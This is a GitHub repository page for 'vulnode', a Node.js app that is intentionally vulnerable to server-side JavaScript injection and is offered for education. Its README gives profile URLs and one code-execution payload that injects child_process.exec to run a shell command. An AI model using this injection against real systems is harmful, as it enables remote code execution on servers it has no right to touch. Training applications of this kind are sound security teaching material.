Skip to content

dpnishant/vulnode

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
ThreatDragonModels/Vulnerable Node app
ThreatDragonModels/Vulnerable Node app
 
 
db
db
 
 
.deepsource.toml
.deepsource.toml
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
app.js
app.js
 
 
header.txt
header.txt
 
 

Repository files navigation

vulnode

Vulnode is a Node.js application vulnerable to server-side javascript injection. This is for education purposes only.

  • Save a profile: http://localhost:9091/?action=save&name=nishant&json={"name":"Nishant","age":"25","gender":"Male","location":"Bangalore","interests":"Piano"}

  • View a profile: http://localhost:9091/?action=view&name=nishant

  • Delete a profile: http://localhost:9091/?action=delete&name=nishant

  • Code Execution: http://localhost:9091/?json='test');var sys=require('sys');var exec=require('child_process').exec;function puts(error,stdout,stderr){sys.puts(stdout)};exec("ls -lah",puts);

About

a vulnerable node.js application for education purpose

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages